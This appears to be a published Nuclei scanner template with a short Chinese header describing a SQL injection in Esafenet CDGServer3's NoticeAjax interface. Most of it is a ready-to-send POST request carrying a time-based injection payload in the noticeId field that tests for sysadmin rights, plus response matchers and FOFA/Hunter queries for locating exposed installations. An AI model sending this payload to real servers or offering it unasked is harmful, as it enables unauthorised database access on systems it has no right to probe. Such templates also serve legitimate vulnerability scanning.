漏洞描述
CDGServer3 NoticeAjax Interface Sql Injection.
esafenet-noticeajax-sqli: Esafenet CDG NoticeAjax - Sql Injection
PoC代码[已公开]
id: esafenet-noticeajax-sqli
info:
name: Esafenet CDG NoticeAjax - Sql Injection
author: adeljck
severity: high
description: |
CDGServer3 NoticeAjax Interface Sql Injection.
metadata:
verified: true
max-request: 1
fofa-query: title="电子文档安全管理系统",body="CDGServer3/"
hunter-query: web.title="电子文档安全管理系统",web.body="CDGServer3/"
product: electronic_document_security_management_system
vendor: esafenet
tags: esafenet,sqli,vuln
http:
- raw:
- |
@timeout: 10s
POST /CDGServer3/NoticeAjax;Service HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: application/x-www-form-urlencoded
command=delNotice¬iceId=123';if+(select+IS_SRVROLEMEMBER('sysadmin'))=1+WAITFOR+DELAY+'0:0:5'--
matchers:
- type: dsl
dsl:
- 'contains(content_type,"text/xml")'
- 'contains(body,"OK")'
- 'status_code == 200'
condition: and
# digest: 490a00463044022030478a0e3db8f6da7cb2f2cfa8a8d6cb977fb69c700118881170070e8a40332e0220110d6425cdadbbc1683931c465a67a15e82216efb5fdee6534a10847bd15dd21:922c64590222798bb761d5b6d8e72950